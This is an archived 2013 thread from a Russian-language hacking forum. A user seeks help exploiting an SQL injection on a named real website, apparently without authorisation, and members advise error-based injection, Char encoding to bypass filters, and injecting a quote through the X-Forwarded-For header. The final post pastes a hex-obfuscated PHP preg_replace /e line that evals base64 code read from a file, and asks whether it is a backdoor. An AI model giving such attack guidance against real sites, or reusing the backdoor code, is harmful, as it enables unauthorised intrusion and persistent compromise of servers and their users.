ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
25.05.2013, 20:04
|
|
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
Провел на форуме:
4061203
Репутация:
704
|
|
Сообщение от Protocoler
Protocoler said:
Параметр id= в сайте уязвим, при поставке кавычки вылетает ошибка MySQL. Хавиджем все нормально. Но в ручную никак. Не могу использовать не order+by не group+by не работаю, union + select тоже не работает ? каким способом можно найти количество полей ?
фильтры
|
|
|
25.05.2013, 20:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Protocoler
Protocoler said:
Параметр id= в сайте уязвим, при поставке кавычки вылетает ошибка MySQL. Хавиджем все нормально. Но в ручную никак. Не могу использовать не order+by не group+by не работаю, union + select тоже не работает ? каким способом можно найти количество полей ?
через еррор базед например, кинул бы ссылку чтоле
|
|
|
|
26.05.2013, 12:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
9074
Репутация:
81
|
|
Сообщение от qaz
qaz said:
через еррор базед например, кинул бы ссылку чтоле
http://www.agriculturalcrossing.com/
И где можно кодировать в Char для обхода фильтров ? Или надо свой софт писать ?
|
|
|
|
26.05.2013, 12:56
|
|
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
Провел на форуме:
4061203
Репутация:
704
|
|
Сообщение от Protocoler
Protocoler said:
http://www.agriculturalcrossing.com/
И где можно кодировать в Char для обхода фильтров ? Или надо свой софт писать ?
например в плагине hackbar или онлайн сервисами
|
|
|
|
26.05.2013, 13:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
9074
Репутация:
81
|
|
Угу, спасибо. Скачаю плагин. Еще вопрос. Мне акунетикс светит уязвимость в заголовке client-ip , но просмотрев заголовки плагином по адресу который указан в акунетиксе, такого заголовка там нет ( Как быть ?
|
|
|
|
26.05.2013, 13:39
|
|
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
Провел на форуме:
4061203
Репутация:
704
|
|
Сообщение от Protocoler
Protocoler said:
Угу, спасибо. Скачаю плагин. Еще вопрос. Мне акунетикс светит уязвимость в заголовке client-ip , но просмотрев заголовки плагином по адресу который указан в акунетиксе, такого заголовка там нет ( Как быть ?
надо отправить хидер с ковычкой)
|
|
|
|
26.05.2013, 13:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
9074
Репутация:
81
|
|
Так нету куда слать. Просто хидера client_ip нету .
|
|
|
|
26.05.2013, 14:14
|
|
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
Провел на форуме:
4061203
Репутация:
704
|
|
Сообщение от Protocoler
Protocoler said:
Так нету куда слать. Просто хидера client_ip нету .
есть X_FORWARDED_FOR
тебе это надо
|
|
|
|
26.05.2013, 14:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от Protocoler
Protocoler said:
Угу, спасибо. Скачаю плагин. Еще вопрос. Мне акунетикс светит уязвимость в заголовке client-ip , но просмотрев заголовки плагином по адресу который указан в акунетиксе, такого заголовка там нет ( Как быть ?
Нет там уязвимости, откуда ты взял это?
|
|
|
|
26.05.2013, 16:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
29647
Репутация:
1
|
|
Наткнулся на
Код:
Code:
@preg_replace("\x25\50\x5b\141\x2d\172\x41\55\x5a\60\x2d\71\x2b\75\x20\137\x2d\135\x2b\51\x25\145\x73\151","\x65\166\x61\154\x28\47\x24\153\x79\145\x3d\67\x36\64\x38\70\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x6b\171\x65\75\x37\66\x34\70\x38\73","\x4c\63\x5a\150\x63\151\x39\63\x64\63\x63\166\x64\155\x68\166\x63\63\x52\172\x4c\62\x39\171\x63\62\x4e\157\x62\110\x56\171\x59\62\x67\165\x5a\107\x55\166\x61\110\x52\60\x63\107\x52\166\x59\63\x4d\166\x64\63\x41\164\x59\62\x39\165\x64\107\x56\165\x64\103\x39\61\x63\107\x78\166\x59\127\x52\172\x4c\172\x49\167\x4d\124\x41\166\x4d\104\x55\166\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");
не бэкдор чейто часом? |
|
|
|
|
 |
|
|
Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
|
|
|
|
Похожие темы
Комбинированный вид